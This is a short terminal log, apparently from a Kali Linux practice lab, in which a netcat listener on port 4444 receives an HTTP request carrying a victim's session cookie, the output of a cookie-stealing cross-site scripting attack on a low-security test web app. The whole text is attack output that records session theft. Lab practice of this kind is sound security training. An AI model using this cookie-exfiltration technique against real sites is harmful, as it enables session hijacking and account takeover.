┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444                            
listening on [any] 4444 ...
connect to [192.168.104.100] from (UNKNOWN) [192.168.104.100] 56530
GET /?cookie=security%3Dlow%3B%20PHPSESSID%3Db8adb51cf69668875df6a1f0aeabab12 HTTP/1.1
Host: 192.168.104.100:4444
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.104.150/
